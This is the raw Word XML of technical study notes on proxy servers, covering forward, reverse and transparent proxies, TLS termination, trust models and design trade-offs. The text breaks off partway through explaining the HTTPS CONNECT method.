    <w:p w14:paraId="020BAADF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy Server = Network Intermediary That Terminates + Re-initiates Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6D94C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">             + Applies Policy (security, routing, caching, transformation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEAF97F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">             + Provides Observability (logging, metrics, tracing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54727984" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">             + Creates Indirection (client/server don't know about each other)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACAADF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="692418C2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The Three Proxy Directions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D6ABF6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Forward Proxy:     Acts for clients  → hides client from server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8FBBE8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">                     Client knows → server doesn't</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B288E51" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">                     Use: access control, caching, anonymization, SSL inspection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE8ADDD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="4262DB9D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Reverse Proxy:     Acts for servers  → hides server from client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658FF830" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                     Server knows → client doesn't</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3147B1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">                     Use: load balancing, TLS termination, caching, WAF, API gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00982D9E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="691AB17B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Transparent Proxy: Intercepts without client configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4017A688" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">                     Neither knows fully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665C9575" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">                     Use: ISP filtering, network-level caching, transparent SSL inspection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE927B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="5DA63E84" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The Core Proxy Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB932E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Connection lifecycle: Terminate client conn → apply policy → initiate backend conn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E1D547" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  SSL termination:      Read TLS, decrypt, inspect/transform, re-encrypt or forward plain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BFE213" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Connection pooling:   Maintain backend connections, reuse to avoid handshake overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50F893" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Event loop I/O:       Non-blocking epoll/kqueue, handle thousands of conns per thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CFB0A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Zero-copy forwarding: splice/sendfile for pass-through traffic without user-space copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D178E18" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="4BB2F1EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The Proxy Feature Stack (each layer adds capability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF80EAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  L4 Proxy:       Forward TCP flows, NAT, minimal overhead (millions of PPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957ED2D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  L7 Proxy:       HTTP awareness, header inspection, routing decisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D328129" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Caching Proxy:  Store responses, serve from cache, reduce origin load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591C301" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Security Proxy: WAF, DLP, SSL inspection, authentication, rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2F7A6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  API Gateway:    Auth, rate limiting, aggregation, transformation, versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B135F91" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Service Mesh:   mTLS, circuit breaking, retries, observability, fault injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146035B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="25FBB76A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The Proxy Trust Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B83300" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Proxies create trust boundaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69896A81" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Client trusts proxy's certificate (SSL termination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7B918" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Backend trusts proxy's identity (mTLS from proxy to backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414AC94" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    System trusts proxy for IP propagation (X-Forwarded-For, PROXY Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D81F5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF65D4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Zero-trust inverts this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595236FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Nothing trusted by network location alone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214012B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Everything authenticated and authorized at every request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147D9B20" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    Proxy enforces identity + posture + authorization per request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4DF8F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="02F14EFD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The Fundamental Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6FF1CF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Inspection depth    ↔  Performance (reading body costs time and CPU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279C915B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  SSL termination     ↔  Privacy (proxy can read all HTTPS — feature and threat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8123E7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Caching             ↔  Freshness (serve stale for speed vs always fresh from origin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B3893" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Centralization      ↔  Fault tolerance (single proxy = single point of failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC62934" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Transparency        ↔  Client configuration (transparent proxy = no config needed but harder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3627ACDF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  Anonymization depth ↔  Latency (more hops = more anonymity = more latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1FBFF4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a proxy is not a passive forwarder — it is an active participant in the communication that derives its power entirely from its position in the network topology.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> By sitting between all communicating parties, the proxy sees everything, can modify anything, and can enforce any policy — without requiring changes to either clients or servers. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>principle of interposition</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>: the most powerful network security, performance, and observability primitives are implemented not by changing the endpoints, but by inserting a controlled intermediary between them. Every major internet-scale capability — CDN caching, DDoS mitigation, SSL offloading, API rate limiting, zero-trust access, distributed tracing, traffic analytics — is fundamentally built on proxy interposition. Understanding proxies is understanding the control plane of the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3057F16B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="00397DF6"/>
    <w:p w14:paraId="051AE7AD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy Servers in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436955C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What a Proxy Server Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0CEF7E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>A proxy server is an intermediary that sits between a client and a destination server, intercepting, processing, and forwarding requests and responses between them. It acts on behalf of one party (client or server) without the other party necessarily knowing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CA565" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The deeper truth:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> A proxy is not merely a relay — it's a programmable interception point that can transform, inspect, cache, filter, authenticate, encrypt, load balance, and control traffic flowing through it. It provides a layer of indirection that decouples clients from servers, enabling powerful architectural patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71C778" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle — indirection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE0DC7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Without proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B635433" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1F840" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client ──────────────────────────────────── Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD9347" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>(tightly coupled, direct knowledge of each other)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC7F771" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>With proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C6C37" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B803C5E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client ───── Proxy ───── Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7198B970" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>(client and server are decoupled, proxy can intervene)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EEEFC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>This indirection enables every proxy use case: caching, security, anonymity, load balancing, transformation, and access control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F2DF3C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="08A6A368">
          <v:rect id="_x0000_i3317" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AE8A6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Forward Proxy vs. Reverse Proxy — The Fundamental Distinction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266BF8B4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Forward Proxy (Client-Side Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730E769" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acts on behalf of the CLIENT.</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The client knows about the proxy and explicitly routes traffic through it. The server doesn't know a proxy is involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A6EB3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E5B4C6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Client] ──knows──&gt; [Forward Proxy] ──────&gt; [Internet/Server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54F168" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                     (client's agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE2F0B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331FBA66" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Client is configured to use the proxy (browser settings, environment variable, OS config).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633EA934" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Instead of connecting directly to example.com:443, client connects to the proxy (e.g., proxy.corp.com:8080).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE1B09" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends the FULL destination URL in the request: GET http://example.com/page HTTP/1.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A901EBB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy receives the request, evaluates policies (is this URL allowed? is this user authenticated?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F7CC85" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If allowed: proxy opens its OWN connection to example.com, forwards the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6DC2F6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Server sees the proxy's IP as the client (doesn't know the real client exists).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD3D7F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Server responds to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CFAB7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy forwards the response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B268E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For HTTPS (CONNECT method):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F82FAE3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy can't read encrypted HTTPS content without breaking TLS. So:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFC67B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends: CONNECT example.com:443 HTTP/1.1 to the proxy.</w:t>
      </w:r>
    </w:p>
